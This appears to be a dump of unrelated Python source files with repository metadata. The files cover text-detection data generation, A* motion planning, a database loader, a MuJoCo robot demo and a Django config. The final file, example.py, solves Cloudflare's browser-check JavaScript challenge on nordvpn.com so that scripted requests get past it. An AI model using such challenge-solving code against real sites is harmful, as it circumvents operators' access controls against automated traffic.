def __generate_rbox(self, im_size, polys, tags, num_classes):
"""Genrate score_map and geo_map for image"""
h, w = im_size
poly_mask = np.zeros((h, w), dtype=np.uint8)
score_map = np.zeros((h, w), dtype=np.uint8)
geo_map = np.zeros((h, w, 5), dtype=np.float32)
outBoxs = []
cropBoxs = []
angles = []
text_tags = []
recg_masks = []
# mask used during traning, to ignore some hard areas
training_mask = np.ones((h, w), dtype=np.uint8)
for poly_idx, poly_tag in enumerate(zip(polys, tags)):
poly = poly_tag[0]
#print(poly)
tag = poly_tag[1]
#print(tag)
r = [None, None, None, None]
for i in range(4):
r[i] = min(np.linalg.norm(poly[i] - poly[(i + 1) % 4]),
np.linalg.norm(poly[i] - poly[(i - 1) % 4]))
# score map
shrinked_poly = self.__shrink_poly(poly.copy(), r).astype(np.int32)[np.newaxis, :, :]
cv2.fillPoly(score_map, shrinked_poly, 1)
cv2.fillPoly(poly_mask, shrinked_poly, poly_idx + 1)
# if geometry == 'RBOX':
# generate a parallelogram for any combination of two vertices
fitted_parallelograms = []
for i in range(4):
p0 = poly[i]
p1 = poly[(i + 1) % 4]
p2 = poly[(i + 2) % 4]
p3 = poly[(i + 3) % 4]
edge = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
backward_edge = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
forward_edge = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
if self.__point_dist_to_line(p0, p1, p2) > self.__point_dist_to_line(p0, p1, p3):
# parallel lines through p2
if edge[1] == 0:
edge_opposite = [1, 0, -p2[0]]
else:
edge_opposite = [edge[0], -1, p2[1] - edge[0] * p2[0]]
else:
# after p3
if edge[1] == 0:
edge_opposite = [1, 0, -p3[0]]
else:
edge_opposite = [edge[0], -1, p3[1] - edge[0] * p3[0]]
# move forward edge
new_p0 = p0
new_p1 = p1
new_p2 = p2
new_p3 = p3
new_p2 = self.__line_cross_point(forward_edge, edge_opposite)
if self.__point_dist_to_line(p1, new_p2, p0) > self.__point_dist_to_line(p1, new_p2, p3):
# across p0
if forward_edge[1] == 0:
forward_opposite = [1, 0, -p0[0]]
else:
forward_opposite = [forward_edge[0], -1, p0[1] - forward_edge[0] * p0[0]]
else:
# across p3
if forward_edge[1] == 0:
forward_opposite = [1, 0, -p3[0]]
else:
forward_opposite = [forward_edge[0], -1, p3[1] - forward_edge[0] * p3[0]]
new_p0 = self.__line_cross_point(forward_opposite, edge)
new_p3 = self.__line_cross_point(forward_opposite, edge_opposite)
fitted_parallelograms.append([new_p0, new_p1, new_p2, new_p3, new_p0])
# or move backward edge
new_p0 = p0
new_p1 = p1
new_p2 = p2
new_p3 = p3
new_p3 = self.__line_cross_point(backward_edge, edge_opposite)
if self.__point_dist_to_line(p0, p3, p1) > self.__point_dist_to_line(p0, p3, p2):
# across p1
if backward_edge[1] == 0:
backward_opposite = [1, 0, -p1[0]]
else:
backward_opposite = [backward_edge[0], -1, p1[1] - backward_edge[0] * p1[0]]
else:
# across p2
if backward_edge[1] == 0:
backward_opposite = [1, 0, -p2[0]]
else:
backward_opposite = [backward_edge[0], -1, p2[1] - backward_edge[0] * p2[0]]
new_p1 = self.__line_cross_point(backward_opposite, edge)
new_p2 = self.__line_cross_point(backward_opposite, edge_opposite)
fitted_parallelograms.append([new_p0, new_p1, new_p2, new_p3, new_p0])
areas = [Polygon(t).area for t in fitted_parallelograms]
parallelogram = np.array(fitted_parallelograms[np.argmin(areas)][:-1], dtype=np.float32)
# sort thie polygon
parallelogram_coord_sum = np.sum(parallelogram, axis=1)
min_coord_idx = np.argmin(parallelogram_coord_sum)
parallelogram = parallelogram[
[min_coord_idx, (min_coord_idx + 1) % 4, (min_coord_idx + 2) % 4, (min_coord_idx + 3) % 4]]
rectange = self.__rectangle_from_parallelogram(parallelogram)
rectange, rotate_angle = self.__sort_rectangle(rectange)
p0_rect, p1_rect, p2_rect, p3_rect = rectange
# if the poly is too small, then ignore it during training
poly_h = min(np.linalg.norm(p0_rect - p3_rect), np.linalg.norm(p1_rect - p2_rect))
poly_w = min(np.linalg.norm(p0_rect - p1_rect), np.linalg.norm(p2_rect - p3_rect))
invaild = (min(poly_h, poly_w) < 6) or tag is None or (True and poly_h > poly_w * 2)
if invaild:
cv2.fillPoly(training_mask, poly.astype(np.int32)[np.newaxis, :, :], 0)
xy_in_poly = np.argwhere(poly_mask == (poly_idx + 1))
if not invaild:
roiRotatePara = self.__generate_roiRotatePara(rectange, rotate_angle)
if roiRotatePara:
outBox, cropBox, angle = roiRotatePara
if min(cropBox[2:]) > 6:
w , h = cropBox[2:]
textImgW = np.ceil(min(w / float(h) * 32, 256) / 4 /1)
#print(tag)
if textImgW >= 2 * min(len(tag), 16): # avoid CTC error
outBoxs.append(outBox)
cropBoxs.append(cropBox)
angles.append(angle)
text_tags.append(tag[:16])
recg_masks.append(1.)
for y, x in xy_in_poly:
point = np.array([x, y], dtype=np.float32)
# top
geo_map[y, x, 0] = self.__point_dist_to_line(p0_rect, p1_rect, point) + 3
# right
geo_map[y, x, 1] = self.__point_dist_to_line(p1_rect, p2_rect, point) + 3
# down
geo_map[y, x, 2] = self.__point_dist_to_line(p2_rect, p3_rect, point) + 3
# left
geo_map[y, x, 3] = self.__point_dist_to_line(p3_rect, p0_rect, point) + 3
# angle
geo_map[y, x, 4] = rotate_angle
if len(outBoxs) == 0:
outBoxs.append([0, 0, 2 * 4, 2 * 4]) # keep extract From sharedConv feature map not zero
cropBoxs.append([0, 0, 2 * 4, 2 * 4])
angles.append(0.)
text_tags.append([num_classes - 2])
recg_masks.append(0.)
outBoxs = np.array(outBoxs, np.int32)
cropBoxs = np.array(cropBoxs, np.int32)
angles = np.array(angles, np.float32)
return score_map, geo_map, training_mask, (outBoxs, cropBoxs, angles), text_tags, recg_masks
def generate(self, input_size=512, batch_size=32, isSynth = True):
"""Given batch size and image shape, generate ground truth features for modeling"""
# Get image path list for Synth or ICDAR image
image_list = []
synth_dict = None
num_classes = 0
if isSynth:
image_list = self.__loadSynthImages()
synth_dict = self.__loadAllSynthGT()
num_classes = len([text for texts in synth_dict['txt'] for text in texts])
else:
image_list = self.__loadICDARImages()
num_classes = self.__textTagsCounts_ICDAR()
if not image_list:
raise Exception('No image available!!')
index = np.arange(0, len(image_list))
while True:
np.random.shuffle(index)
images = []
image_fns = []
score_maps = []
geo_maps = []
training_masks = []
rboxes = []
tags = []
recg_masks = []
for i in index:
try:
im_fn = image_list[i]
im = cv2.imread(im_fn,cv2.IMREAD_UNCHANGED)
if im is None:
continue
h, w, _ = im.shape
if isSynth:
text_polys, text_tags = self.__loadGT_Synth(im_fn, synth_dict)
else:
text_polys, text_tags = self.__loadGT_ICDAR(im_fn)
text_polys, text_tags = self.__check_and_validate_polys(text_polys, text_tags, (h, w))
#resize the image to input size
new_h, new_w, _ = im.shape
resize_h = input_size
resize_w = input_size
im = cv2.resize(im, dsize=(512, 512),interpolation = cv2.INTER_AREA)
resize_ratio_3_x = resize_w/float(new_w)
resize_ratio_3_y = resize_h/float(new_h)
text_polys[:, :, 0] *= resize_ratio_3_x
text_polys[:, :, 1] *= resize_ratio_3_y
new_h, new_w, _ = im.shape
score_map, geo_map, training_mask, rbox, text_tags, recg_mask = self.__generate_rbox((new_h, new_w), text_polys, text_tags, num_classes)
images.append(im)
image_fns.append(im_fn)
score_maps.append(score_map[::, ::, np.newaxis].astype(np.float32))
geo_maps.append(geo_map[::, ::, :].astype(np.float32))
training_masks.append(training_mask[::, ::, np.newaxis].astype(np.float32))
rboxes.append(rbox)
tags.append(text_tags)
recg_masks.append(recg_mask)
if len(images) == batch_size:
input_images = np.array(images)
feature_maps = np.concatenate([np.array(score_maps), np.array(geo_maps), np.array(training_masks)],axis=3)
yield (input_images, feature_maps)
images = []
image_fns = []
score_maps = []
geo_maps = []
training_masks = []
rboxes = []
tags = []
recg_masks = []
except Exception as e:
print(image_list[i])
traceback.print_exc()
continue
def generateRecogTextSynth(self, input_size = 512):
"""Generate synth text images for recognition"""
# Load image paths and gt dict
image_list = self.__loadSynthImages()
synth_dict = self.__loadAllSynthGT()
num_classes = len([text for texts in synth_dict['txt'] for text in texts])
# sample 5k images out of 10k
image_list = random.sample(image_list,5000)
index = np.arange(0, len(image_list))
np.random.shuffle(index)
c=0
paths=[]
words=[]
if not os.path.exists('synth_word_texts'):
os.mkdir('synth_word_texts')
for i in index:
try:
im_fn = image_list[i]
im = cv2.imread(im_fn,cv2.IMREAD_UNCHANGED)
if im is None:
continue
h, w, _ = im.shape
text_polys, text_tags = self.__loadGT_Synth(im_fn, synth_dict)
text_polys, text_tags = self.__check_and_validate_polys(text_polys, text_tags, (h, w))
#resize the image to input size
new_h, new_w, _ = im.shape
resize_h = input_size
resize_w = input_size
im = cv2.resize(im, dsize=(512, 512),interpolation = cv2.INTER_AREA)
resize_ratio_3_x = resize_w/float(new_w)
resize_ratio_3_y = resize_h/float(new_h)
text_polys[:, :, 0] *= resize_ratio_3_x
text_polys[:, :, 1] *= resize_ratio_3_y
new_h, new_w, _ = im.shape
score_map, geo_map, training_mask, rbox, text_tags, recg_mask = self.__generate_rbox((new_h, new_w), text_polys, text_tags, num_classes)
outbox, cropbox,angle=rbox
for i in range(len(outbox)):
if(recg_mask[i]!=0):
out=outbox[i]
crop=cropbox[i]
if(im.shape[0]>out[3]+out[1] and im.shape[1]>out[2]+out[0] and out[2]>=0 and out[3]>=0 and out[1]>=0 and out[0]>=0):
ang = angle[i]
img = tf.image.crop_to_bounding_box(im,out[1],out[0],out[3],out[2])
img = tf.keras.preprocessing.image.random_rotation(img,ang*180/np.pi,)
if not isinstance(img,np.ndarray):
img=img.numpy()
img = cv2.resize(img,(128,64),interpolation = cv2.INTER_AREA)
img = cv2.detailEnhance(img)
c+=1
cv2.imwrite('synth_word_texts/word_'+str(c)+'.png',img)
paths.append('synth_word_texts/word_'+str(c)+'.png')
words.append(text_tags[i])
except Exception as e:
print(image_list[i])
import traceback
traceback.print_exc()
continue
data=pd.DataFrame({"path":paths,"word":words})
return data
| [
"noreply@github.com"
] | Amlan-Gopal.noreply@github.com |
04d47422d6a76801d62c26410a9a43db11a6255f | 2a8891bbfbd6fa9fa8569adac51194bfaef97f5d | /config.py | 4f2085183a3645a4dd60ba56ea5198de402ea5b9 | [] | no_license | artbn/RC | a39db55b62387704954998c22be5e625501ce84d | a6d796ce84a02aa219e6e22a94b6f8db85a817ce | refs/heads/master | 2020-03-23T20:44:13.482299 | 2018-07-23T19:27:05 | 2018-07-23T19:27:05 | 142,059,485 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | username = ""
password = ""
client_id = ''
client_secret = ''
user_agent = 'Calculates HoC for /r/counting' | [
"artbn@AMA.localdomain"
] | artbn@AMA.localdomain |
2db8ab80ed72844b6bef78bae4348bce7f1c7503 | bbbd7ffcc4b55bed62a96780db8edeca487ba08b | /FCND-Motion-Planning/planning_utils.py | 861933e06cc124770a8870b2aaccfb9797d9bb2f | [] | no_license | spowers42/flying | 9560ce1fda6533c1457267912df5918265add523 | af124cdd8f02b2793287b4751a869d945f850381 | refs/heads/master | 2020-03-17T23:53:43.825796 | 2018-05-20T17:06:32 | 2018-05-20T17:06:32 | 134,065,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,407 | py | from enum import Enum
from queue import PriorityQueue
import numpy as np
def create_grid(data, drone_altitude, safety_distance):
"""
Returns a grid representation of a 2D configuration space
based on given obstacle data, drone altitude and safety distance
arguments.
"""
# minimum and maximum north coordinates
north_min = np.floor(np.min(data[:, 0] - data[:, 3]))
north_max = np.ceil(np.max(data[:, 0] + data[:, 3]))
# minimum and maximum east coordinates
east_min = np.floor(np.min(data[:, 1] - data[:, 4]))
east_max = np.ceil(np.max(data[:, 1] + data[:, 4]))
# given the minimum and maximum coordinates we can
# calculate the size of the grid.
north_size = int(np.ceil(north_max - north_min))
east_size = int(np.ceil(east_max - east_min))
# Initialize an empty grid
grid = np.zeros((north_size, east_size))
# Populate the grid with obstacles
for i in range(data.shape[0]):
north, east, alt, d_north, d_east, d_alt = data[i, :]
if alt + d_alt + safety_distance > drone_altitude:
obstacle = [
int(np.clip(north - d_north - safety_distance - north_min, 0, north_size-1)),
int(np.clip(north + d_north + safety_distance - north_min, 0, north_size-1)),
int(np.clip(east - d_east - safety_distance - east_min, 0, east_size-1)),
int(np.clip(east + d_east + safety_distance - east_min, 0, east_size-1)),
]
grid[obstacle[0]:obstacle[1]+1, obstacle[2]:obstacle[3]+1] = 1
return grid, int(north_min), int(east_min)
# Assume all actions cost the same.
class Action(Enum):
"""
An action is represented by a 3 element tuple.
The first 2 values are the delta of the action relative
to the current grid position. The third and final value
is the cost of performing the action.
"""
WEST = (0, -1, 1)
EAST = (0, 1, 1)
NORTH = (-1, 0, 1)
SOUTH = (1, 0, 1)
@property
def cost(self):
return self.value[2]
@property
def delta(self):
return (self.value[0], self.value[1])
def valid_actions(grid, current_node):
"""
Returns a list of valid actions given a grid and current node.
"""
valid_actions = list(Action)
n, m = grid.shape[0] - 1, grid.shape[1] - 1
x, y = current_node
# check if the node is off the grid or
# it's an obstacle
if x - 1 < 0 or grid[x - 1, y] == 1:
valid_actions.remove(Action.NORTH)
if x + 1 > n or grid[x + 1, y] == 1:
valid_actions.remove(Action.SOUTH)
if y - 1 < 0 or grid[x, y - 1] == 1:
valid_actions.remove(Action.WEST)
if y + 1 > m or grid[x, y + 1] == 1:
valid_actions.remove(Action.EAST)
return valid_actions
def a_star(grid, h, start, goal):
path = []
path_cost = 0
queue = PriorityQueue()
queue.put((0, start))
visited = set(start)
branch = {}
found = False
while not queue.empty():
item = queue.get()
current_node = item[1]
if current_node == start:
current_cost = 0.0
else:
current_cost = branch[current_node][0]
if current_node == goal:
print('Found a path.')
found = True
break
else:
for action in valid_actions(grid, current_node):
# get the tuple representation
da = action.delta
next_node = (current_node[0] + da[0], current_node[1] + da[1])
branch_cost = current_cost + action.cost
queue_cost = branch_cost + h(next_node, goal)
if next_node not in visited:
visited.add(next_node)
branch[next_node] = (branch_cost, current_node, action)
queue.put((queue_cost, next_node))
if found:
# retrace steps
n = goal
path_cost = branch[n][0]
path.append(goal)
while branch[n][1] != start:
path.append(branch[n][1])
n = branch[n][1]
path.append(branch[n][1])
else:
print('**********************')
print('Failed to find a path!')
print('**********************')
return path[::-1], path_cost
def heuristic(position, goal_position):
return np.linalg.norm(np.array(position) - np.array(goal_position))
| [
"spowers.42@gmail.com"
] | spowers.42@gmail.com |
122dfe826c7c5c53f479eb39847069b57f6ed0de | 54f9074cb1ce68d71f0848a7f66b5272fb820288 | /scripts/kladoi.py | 08b64842e4da8dc2dac166cbdd618d647d9ca292 | [] | no_license | fkaralis/talaiporosanaplirotis | ee7827fccb38e70c834c5d6d19d36ef42ee882dd | 17f7b39655939b9e6559fbef65bcf8df4656468d | refs/heads/master | 2021-01-11T02:04:29.743459 | 2018-09-17T13:41:49 | 2018-09-17T13:41:49 | 70,840,487 | 2 | 3 | null | 2016-10-25T18:45:03 | 2016-10-13T19:25:45 | Python | UTF-8 | Python | false | false | 4,080 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
builds Klados table from given path
'''
import pandas as pd
from os import listdir
from os.path import isfile, isdir, join
import sqlalchemy
import pandas
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import exists
from db_init_eidikothtes_dev import Base, Klados, Real_eidikothta
engine = create_engine('sqlite:///talaiporosanaplirotis_eidikothtes_dev.sqlite')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
path = '../data/2016-2017/eniaios_smea_anap_16/'
#path = 'test/'
directories = sorted([d for d in listdir(path) if isdir(join(path,d))])
for dir in directories:
filepath = join(path,dir) + '/'
print(filepath)
files = sorted([(filepath + f) for f in listdir(filepath) if isfile(join(filepath, f))])
for f in files:
kodikoi_kladwn = []
kladoi = []
print(f)
try:
df = pd.read_excel(f, header=0)
for row in df.iterrows():
#count = row[1]['Α/Α']
kodikos_kladoy = row[1]['ΚΛΑΔΟΣ']
try:
# klados already in DB
session.query(Klados).filter(Klados.kodikos_kladoy == kodikos_kladoy).one()
#print('klados', kodikos_kladoy, 'already there')
except sqlalchemy.orm.exc.NoResultFound:
# klados not in DB
if kodikos_kladoy not in kodikoi_kladwn:
# new klados found in file
kodikoi_kladwn.append(kodikos_kladoy)
if kodikos_kladoy.endswith('.50'):
# ΣΜΕΑ
try:
lektiko_kladoy = session.query(Klados).filter(Klados.kodikos_kladoy
== kodikos_kladoy[:-3]).one().lektiko_kladoy + ' ΕΑΕ'
except Exception:
print('SMEA', kodikos_kladoy, 'not found')
lektiko_kladoy = kodikos_kladoy
try:
kodikos_real_eidikothtas = row[1]['ΟΜΑΔΟΠΟΙΗΜΕΝΗ ΕΙΔΙΚΟΤΗΤΑ']
except KeyError as e:
print(e, 'column not found')
else:
# Ενιαίος πίνακας
try:
lektiko_kladoy = row[1]['ΛΕΚΤΙΚΟ ΚΛΑΔΟΥ']
except KeyError as e:
print(e, 'column not found')
lektiko_kladoy = kodikos_kladoy
try:
kodikos_real_eidikothtas = row[1]['ΕΙΔΙΚΟΤΗΤΑ']
except KeyError as e:
print(e, 'column not found')
try:
real_eidikothta_id = session.query(Real_eidikothta).filter(Real_eidikothta.kodikos_real_eidikothtas
== kodikos_real_eidikothtas).one().id
except Exception:
print('real eidikothta not found, setting to 0')
real_eidikothta_id = 0
new_klados = Klados(kodikos_kladoy = kodikos_kladoy,
lektiko_kladoy = lektiko_kladoy,
real_eidikothta_id = real_eidikothta_id)
kladoi.append(new_klados)
for klados in kladoi:
print(filepath, klados.kodikos_kladoy, klados.lektiko_kladoy, klados.real_eidikothta_id)
session.add(klados)
session.commit()
except Exception as e:
print(e)
| [
"fivoskaralis@gmail.com"
] | fivoskaralis@gmail.com |
1e627aaff1f0c48f994b092b322f45d4c1ded3fb | b99590ca634710c0c41d650220766fcd230c4749 | /demos/mujoco/robot_control_scene_creation/Demo_Point_Cloud.py | c809ff9320f22cebc3c927a8e8f47b412f2be80a | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | Yabing67/SimulationFrameworkPublic | 9db38749050c830f906f54f16688013216f90e4d | fc052c21e400a175d5d44e00afe1303d32f3886a | refs/heads/master | 2023-06-24T22:16:17.769225 | 2021-07-20T17:47:38 | 2021-07-20T17:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,358 | py | import classic_framework.mujoco.mujoco_utils.mujoco_controllers as mj_ctrl
from classic_framework.mujoco.MujocoRobot import MujocoRobot
from classic_framework.mujoco.MujocoScene import MujocoScene as Scene
from classic_framework.mujoco.mujoco_utils.mujoco_scene_object import MujocoPrimitiveObject
if __name__ == '__main__':
box1 = MujocoPrimitiveObject(obj_pos=[.5, -0.2, 0.35], obj_name="box1", geom_rgba=[0.1, 0.25, 0.3, 1])
box2 = MujocoPrimitiveObject(obj_pos=[.6, -0.1, 0.35], obj_name="box2", geom_rgba=[0.2, 0.3, 0.7, 1])
box3 = MujocoPrimitiveObject(obj_pos=[.4, -0.1, 0.35], obj_name="box3", geom_rgba=[1, 0, 0, 1])
box4 = MujocoPrimitiveObject(obj_pos=[.6, -0.0, 0.35], obj_name="box4", geom_rgba=[1, 0, 0, 1])
box5 = MujocoPrimitiveObject(obj_pos=[.6, 0.1, 0.35], obj_name="box5", geom_rgba=[1, 1, 1, 1])
box6 = MujocoPrimitiveObject(obj_pos=[.6, 0.2, 0.35], obj_name="box6", geom_rgba=[1, 0, 0, 1])
table = MujocoPrimitiveObject(obj_pos=[0.5, 0.0, 0.2],
obj_name="table0",
geom_size=[0.25, 0.35, 0.2],
mass=2000)
object_list = [box1, box2, box3, box4, box5, box6, table]
scene = Scene(object_list=object_list, control=mj_ctrl.MocapControl()) # if we want to do mocap control
# scene = Scene(object_list=object_list) # ik control is default
duration = 1
mj_Robot = MujocoRobot(scene, gravity_comp=True, num_DoF=7)
mj_Robot.set_gripper_width = 0.0
init_pos = mj_Robot.current_c_pos
init_or = mj_Robot.current_c_quat
mj_Robot.gotoCartPositionAndQuat([0.5, -0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.04
mj_Robot.gotoCartPositionAndQuat([0.5, -0.2, 0.52 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.00
mj_Robot.gotoCartPositionAndQuat(init_pos, init_or, duration=duration)
# Inhand Camera Point Clouds
points_inhand, colors_inhand = scene.get_point_cloud_inHandCam()
scene.visualize_point_clouds(points_inhand, colors_inhand)
mj_Robot.gotoCartPositionAndQuat([0.5, 0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.04
mj_Robot.gotoCartPositionAndQuat([0.6, -0.1, 0.6 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.gotoCartPositionAndQuat([0.6, -0.1, 0.52 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.00
mj_Robot.gotoCartPositionAndQuat(init_pos, init_or, duration=duration)
mj_Robot.gotoCartPositionAndQuat([0.5, 0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.04
mj_Robot.gotoCartPositionAndQuat([.4, -0.1, 0.6 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.gotoCartPositionAndQuat([.4, -0.1, 0.52 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.00
mj_Robot.gotoCartPositionAndQuat(init_pos, init_or, duration=duration)
# Cage Camera Point Clouds
points_cage, colors_cage = scene.get_point_cloud_CageCam()
scene.visualize_point_clouds(points_cage, colors_cage)
mj_Robot.gotoCartPositionAndQuat([0.5, 0.2, 0.65 - 0.1], [0, 1, 0, 0], duration=duration)
mj_Robot.set_gripper_width = 0.04
mj_Robot.gotoCartPositionAndQuat(init_pos, init_or, duration=duration)
| [
"ge.li@kit.edu"
] | ge.li@kit.edu |
80eb6b6100c4e2ed80fed96a55cc7f3f4610d39e | 60b42a25eae1148600c83051444947216f766d6a | /Borrowings/apps.py | b4e0749e0703d9bd9e9ebe69678aa88942dcda9f | [] | no_license | SaketZode/ExpenseManagerBackend | d060c61ebc2c533291d6154ea84b41b217fc919c | 85f7a9426485abc53168bc926ccca885bf754383 | refs/heads/master | 2023-02-16T06:12:48.904544 | 2021-01-17T14:09:35 | 2021-01-17T14:09:35 | 308,875,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class BorrowingsConfig(AppConfig):
name = 'Borrowings'
| [
"55745771+SaketZode@users.noreply.github.com"
] | 55745771+SaketZode@users.noreply.github.com |
b6c27d4355423ad57305b93778a6c56636871433 | 3221b73723fa7be24be2541ef690dfc6d0dbc313 | /example.py | 06a2a932271e2ab1e9b41b76bf11440ffe85ed6b | [] | no_license | ayourk/pycfl | abfd57e9aa06ff2072a214ffdab1d59fa1356a3d | 21a80b8b1ebef5bc2a185060cae6d17312c68d12 | refs/heads/master | 2022-12-10T12:08:21.237216 | 2018-04-07T11:03:05 | 2018-04-07T11:03:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | import re
import requests
import time
from pycfl import pycfl
r = requests.Session()
rc = r.get("https://nordvpn.com/login").text
open('gdown.log', 'w').write(rc)
if 'Checking your browser before accessing' in rc:
ans = pycfl(rc)
jschl_vc = re.search('name="jschl_vc" value="(.+?)"', rc).group(1)
jschl_pass = re.search('name="pass" value="(.+?)"', rc).group(1)
params = {'jschl_vc': jschl_vc,
'pass': jschl_pass,
'jschl_answer': ans}
rc = r.get('https://nordvpn.com/cdn-cgi/l/chk_jschl', params=params).text
open('gdown.log', 'w').write(rc)
| [
"piotr.staroszczyk@get24.org"
] | piotr.staroszczyk@get24.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.